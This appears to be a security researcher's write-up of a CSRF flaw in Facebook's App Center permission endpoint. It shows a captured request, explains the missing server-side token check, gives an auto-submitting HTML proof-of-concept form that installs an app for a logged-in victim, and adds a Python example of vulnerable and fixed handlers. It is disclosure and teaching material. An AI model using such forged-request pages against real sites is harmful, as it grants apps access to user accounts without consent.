Facebook CSRF


I was previously working on apps, so I decided to give this new feature a shot. When the “Play Game” button of a game app was clicked, it generated a POST request.

Example:

POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800

fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40

There are many new parameters in this new feature. The parameter ‘fb_dtsg’ acts as a token and ‘perms’ lists the permissions required by the app. The parameters ‘redirect_uri’ and ‘app_id’ are app-specific values. The remaining parameters seem static except ‘new_perms’ and ‘orig_perms’. I started to play with these two dynamic params and after a few attempts I found that they were no longer needed to add an app.
Anti-CSRF tokens like ‘fb_dtsg’ are supposed to be validated server-side. I was shocked to see that in this new feature the developer had somehow missed this point, and it was possible to add an app without ‘fb_dtsg’. Bang!!

Final PoC for this CSRF looks like this:

<html>
<head>
</head>
<body onload="document.forms[0].submit();">
<form action="https://www.facebook.com/connect/uiserver.php" method="POST">
<input type="hidden" name="perms" value="" />
<input type="hidden" name="dubstep" value="1" />
<input type="hidden" name="new_user_session" value="1" />
<input type="hidden" name="grant_clicked" value="1" />
<input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" />
<input type="hidden" name="app_id" value="2389801228" />
<input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" />
<input type="hidden" name="app_center" value="1" />
<input type="hidden" name="is_paid_app" value="" />
<input type="hidden" name="app_center_ref" value="appcenter" />
<input type="hidden" name="response_type" value="none" />
<input type="hidden" name="from_post" value="1" />
<input type="hidden" name="__uiserv_method" value="permissions.request" />
<input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>
</html>
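The root cause above is a form handler that acts without checking the anti-CSRF token it was issued. As an added illustration (my own code, not Facebook's), here is a minimal handler in the vulnerable shape beside the hardened one; the Session class, the handler names and the sample bodies are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs


# Constructed stand-in for the server-side session store (assumption, not Facebook's code).
@dataclass
class Session:
    user_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(16))


def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body, keeping the last value per key."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def permissions_request_vulnerable(session: Session, body: str) -> str:
    """The behaviour the post describes: fb_dtsg is never checked, so any
    cross-site POST carrying an app_id installs the app for the logged-in user."""
    form = parse_form(body)
    return f"installed app {form['app_id']} for user {session.user_id}"


def permissions_request_fixed(session: Session, body: str) -> str:
    """Hardened handler: the request must carry the token bound to this session.
    A missing token and a wrong token are both rejected; the comparison is
    constant-time so the token cannot be recovered through timing differences."""
    form = parse_form(body)
    token = form.get("fb_dtsg", "")
    if not token or not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return "rejected: invalid or missing fb_dtsg"
    return f"installed app {form['app_id']} for user {session.user_id}"


# Constructed sample body: what a third-party page can send, since it cannot read the token.
CROSS_SITE_BODY = "app_id=2389801228&__uiserv_method=permissions.request&grant_clicked=1"


def demo() -> tuple:
    """Run the same cross-site body through both handlers, then a same-site body through the fix."""
    s = Session(user_id="u1")
    same_site_body = f"fb_dtsg={s.csrf_token}&{CROSS_SITE_BODY}"
    return (permissions_request_vulnerable(s, CROSS_SITE_BODY),
            permissions_request_fixed(s, CROSS_SITE_BODY),
            permissions_request_fixed(s, same_site_body))


if __name__ == "__main__":
    for line in demo():
        print(line)
```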
